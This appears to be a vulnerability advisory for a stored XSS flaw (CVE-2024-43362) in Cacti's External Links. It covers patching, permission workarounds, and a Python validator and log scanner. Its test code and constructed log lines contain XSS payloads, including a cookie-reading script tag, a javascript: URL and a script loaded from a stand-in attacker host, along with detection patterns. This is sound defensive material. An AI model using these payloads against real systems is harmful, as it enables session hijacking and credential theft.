CVE-2024-43362
📋 TL;DR
This stored (persistent) XSS vulnerability in Cacti lets authenticated users who are permitted to create External Links store a script payload in the link's fileurl field. When other users, including administrators, view pages that render the manipulated link, the script executes in their browsers, potentially stealing session cookies or performing actions on their behalf. All Cacti releases before 1.2.28 are affected.
💻 Affected Systems
- Cacti
📦 What is this software?
Cacti is an open-source, PHP-based network monitoring and graphing front-end built around RRDtool, maintained by the Cacti project. It polls devices (typically via SNMP) and stores device addresses and credentials, which is why administrative access to it matters beyond the application itself.
⚠️ Risk & Real-World Impact
Worst Case
An administrator views the poisoned page; the attacker hijacks the admin session (or drives it through injected requests), gains full administrative control of Cacti, and uses that to reach what Cacti holds about the monitored infrastructure: device inventory, SNMP community strings and other stored credentials, plus the script-based data input methods an administrator can define on the Cacti host.
Likely Case
Attackers holding a low-privileged account that can create External Links steal other users' session cookies, perform actions inside Cacti as those users, or redirect them to attacker-controlled sites.
If Mitigated
With allowlist validation of fileurl at submission and HTML output encoding wherever the link is rendered, a script payload is either rejected outright or displayed as inert text instead of executing.
🎯 Exploit Status
Exploitation requires an authenticated account that is allowed to create External Links; no further privilege is needed. With such an account the attack is a single form submission, and because the payload is stored it fires for every user who later loads the affected page until the link is edited or deleted.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 1.2.28
Vendor Advisory: https://github.com/Cacti/cacti/security/advisories/GHSA-wh9c-v56x-v77c
Restart Required: No
Instructions:
1. Back up the Cacti database (mysqldump) and the configuration files (include/config.php and any locally customised files).
2. Download the 1.2.28 release from the official Cacti repository and verify its checksum where one is published.
3. Replace the existing Cacti files with the new version, restoring include/config.php afterwards.
4. Open the Cacti web interface and complete the upgrade wizard so that any database schema changes for the new release are applied.
5. Confirm the version shown in the web interface is 1.2.28 and that polling, graphs and existing External Links still work.
🔧 Temporary Workarounds
Remove External Link Creation Privileges
Temporarily revoke the permission that grants access to External Link creation from all non-administrative users and user groups until the upgrade is done. The safest route is the Permissions tab of each user (and each user group) in the Cacti console. If it must be scripted, note that Cacti keeps per-user permissions as rows in user_auth_realm (and per-group rows in user_auth_group_realm), not as a bitmask in user_auth, and that policy_graphs is only the default allow/deny policy for graphs. Look up the realm id that lib/auth.php ($user_auth_realm_filenames) assigns to links.php, substitute it for the placeholder below, and first check what else that realm gates: a realm that also covers other console pages will lock users out of more than link creation. The built-in admin account is normally user_id 1.
DELETE FROM user_auth_realm WHERE realm_id = <LINKS_REALM_ID> AND user_id <> 1;
DELETE FROM user_auth_group_realm WHERE realm_id = <LINKS_REALM_ID>;
🧯 If You Can't Patch
- If you cannot change Cacti's code, enforce the check in front of it: a WAF or reverse-proxy rule that only allows POSTs to links.php whose fileurl value (after URL decoding) is an http or https URL made of the characters RFC 3986 permits, blocking anything containing quotes, angle brackets, or a javascript: or data: scheme
- Add a Content Security Policy that restricts script sources; Cacti relies heavily on inline scripts, so deploy it as Content-Security-Policy-Report-Only first and tighten it once the reports are clean
- Audit the existing External Links for entries with unexpected URLs and delete any that look like payloads, since a payload stored before the workaround went in stays live
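To make the validation-plus-encoding point concrete, here is an added Python example (not Cacti's own code, which is PHP) modelling the fileurl sink: a vulnerable renderer that interpolates the stored value raw, next to a hardened form that allowlists the URL's characters and scheme at submission and HTML-escapes at output. The function names, the character allowlist and the simplified anchor-tag sink are assumptions for illustration, not Cacti's actual rendering path.

```python
import html
import re
from urllib.parse import urlsplit

# Character allowlist: the unreserved and reserved URL characters of RFC 3986 plus '%'.
# Quotes, angle brackets, whitespace and control characters are deliberately absent.
_URL_CHARS = re.compile(r"[A-Za-z0-9\-._~:/?#\[\]@!$&'()*+,;=%]+")
_ALLOWED_SCHEMES = {"http", "https"}  # what an External Link legitimately points at
_MAX_LEN = 2048                       # assumed limit for this example


def validate_fileurl(url: str) -> bool:
    """Allowlist check for a submitted fileurl value: length, characters, scheme, host."""
    if not url or len(url) > _MAX_LEN:
        return False
    if not _URL_CHARS.fullmatch(url):            # rejects '"', '<', '>', spaces, controls
        return False
    parts = urlsplit(url)
    if parts.scheme.lower() not in _ALLOWED_SCHEMES:  # rejects javascript:, data:, vbscript:
        return False
    return bool(parts.netloc)                     # a real host, not "http:///"


def render_link_vulnerable(title: str, url: str) -> str:
    """The bug pattern (simplified model): stored values dropped into HTML unescaped."""
    return '<a href="%s">%s</a>' % (url, title)


def render_link(title: str, url: str) -> str:
    """Hardened form: validate on input, and still encode on output (defence in depth)."""
    if not validate_fileurl(url):
        raise ValueError("fileurl rejected by allowlist")
    return '<a href="%s">%s</a>' % (html.escape(url, quote=True),
                                    html.escape(title, quote=True))


if __name__ == "__main__":
    payload = 'http://x.example/"><script>alert(document.cookie)</script>'
    print(render_link_vulnerable("NOC", payload))   # the script tag lands in the page
    print(validate_fileurl(payload))                # False: '"' and '<' are not allowed
    print(validate_fileurl("javascript:alert(1)"))  # False: scheme is not http(s)
    print(render_link("Bob's \"NOC\"", "https://x.example/a&b=1"))
```

A percent-encoded sequence such as %3Cscript%3E passes the character check by design: the browser treats it as URL data, not markup, and the output-encoding step guarantees that a literal % can never turn into a < during rendering. The two layers are independent, which is why the hardened renderer escapes even values the validator already accepted.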
🔍 How to Verify
Check if Vulnerable:
Any Cacti release before 1.2.28 is vulnerable. Read the version from the console's About page, from the installed files, or from the database. Depending on the release the file-side version string lives in include/cacti_version or directly in include/global.php; the database value is what the upgrade wizard last recorded, so it should agree with the files.
Check Version:
cat include/cacti_version 2>/dev/null; grep -n "cacti_version" include/global.php
mysql -u cactiuser -p cacti -e "SELECT cacti FROM version;"
Verify Fix Applied:
Verify the version is 1.2.28 or higher in both the files and the version table (a mismatch means the files were replaced but the upgrade wizard was not completed). Then, as a user permitted to create External Links, submit a test link whose fileurl contains a double quote and an angle bracket and confirm it is rejected, or appears HTML-escaped in the page source rather than as live markup.
📡 Detection & Monitoring
Log Indicators:
- POST requests to links.php whose fileurl value, after URL decoding, contains script tags, event-handler attributes or a javascript: scheme. A stock Apache or nginx access log records only the request line, not the POST body, so this requires body logging at a WAF, reverse proxy or ModSecurity audit log
- Multiple failed login attempts followed by a successful login and immediate External Link creation
- Existing External Links whose URL uses any scheme other than http or https (review the External Links list, not just the logs, since the payload is stored)
Network Indicators:
- HTTP POST requests to links.php carrying script tags or JavaScript in the fileurl parameter; the value arrives percent-encoded and may be double-encoded, so decode before matching
SIEM Query:
Illustrative only: field names depend on the log source, and fileurl must be URL-decoded before the comparison or an encoded payload will not match.
source="cacti_access.log" AND (uri_path="/links.php" OR uri_path="/link.php") AND (fileurl CONTAINS "<script" OR fileurl CONTAINS "javascript:" OR fileurl CONTAINS "onerror=")
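As an added example, not part of the original page or of Cacti, the following Python runs the detection logic above over constructed log lines. It assumes a reverse proxy or WAF in front of Cacti that appends the URL-encoded POST body as a final quoted field (a stock access log would not have it); the log lines, users, addresses and field layout are all constructed for the example. It also adds a second, higher-precision signal the SIEM query lacks: any fileurl whose scheme is not http or https.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Constructed sample lines, not real Cacti traffic. The final quoted field is the
# request body, which stock Apache/nginx access logs do not record; the assumption
# is a reverse proxy or WAF that logs it URL-encoded, exactly as the browser sent it.
SAMPLE_LOG = """\
10.0.0.5 - alice [12/Aug/2024:10:15:01 +0000] "POST /cacti/links.php HTTP/1.1" 302 "title=NOC+Dashboard&fileurl=https%3A%2F%2Fgrafana.example%2Fd%2Fabc%3ForgId%3D1"
10.0.0.9 - mallory [12/Aug/2024:10:16:44 +0000] "POST /cacti/links.php HTTP/1.1" 302 "title=x&fileurl=javascript%3Aalert%28document.cookie%29"
10.0.0.9 - mallory [12/Aug/2024:10:17:02 +0000] "POST /cacti/links.php HTTP/1.1" 302 "title=x&fileurl=http%3A%2F%2Fx.example%2F%2522%253E%253Cscript%2520src%3D%2F%2Fevil.example%2Fa.js%253E"
10.0.0.7 - bob [12/Aug/2024:10:18:10 +0000] "GET /cacti/graph_view.php HTTP/1.1" 200 "-"
10.0.0.7 - bob [12/Aug/2024:10:19:30 +0000] "POST /cacti/links.php HTTP/1.1" 302 "title=Wiki&fileurl=http%3A%2F%2Fwiki.example%2Findex.php%3Ftitle%3DCacti"
"""

_LINE = re.compile(
    r'^(?P<client>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) "(?P<body>[^"]*)"$'
)
_TARGET_SCRIPTS = ("links.php", "link.php")
# Script-like content, matched after decoding: tags, javascript: scheme, common handlers.
_PAYLOAD = re.compile(
    r"<\s*(?:script|iframe|img|svg)\b|javascript\s*:|\bon(?:error|load|click|mouseover|focus)\s*=",
    re.I,
)


def fully_decode(value: str, rounds: int = 3) -> str:
    """URL-decode until stable so a double-encoded payload cannot dodge a literal match."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan_line(line: str) -> list:
    """Return one finding per suspicious fileurl value in a POST to links.php or link.php."""
    m = _LINE.match(line)
    if not m or m.group("method") != "POST":
        return []
    if not m.group("path").split("?", 1)[0].endswith(_TARGET_SCRIPTS):
        return []
    findings = []
    for raw in parse_qs(m.group("body"), keep_blank_values=True).get("fileurl", []):
        value = fully_decode(raw)            # parse_qs decoded once; strip further layers
        reasons = []
        if _PAYLOAD.search(value):
            reasons.append("script-like content")
        scheme = urlsplit(value).scheme.lower()
        if scheme not in ("http", "https"):  # an External Link has no business elsewhere
            reasons.append("non-http scheme %r" % scheme)
        if reasons:
            findings.append({"user": m.group("user"), "client": m.group("client"),
                             "time": m.group("ts"), "fileurl": value, "reasons": reasons})
    return findings


def scan_log(text: str) -> list:
    """Scan a whole log; returns findings in line order."""
    return [f for line in text.splitlines() if line.strip() for f in scan_line(line)]


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

On the sample, alice's and bob's legitimate links produce nothing, mallory's javascript: link is caught by both signals, and the double-encoded payload is caught only because fully_decode peels the second layer; a literal CONTAINS "<script>" against the raw field would have missed it.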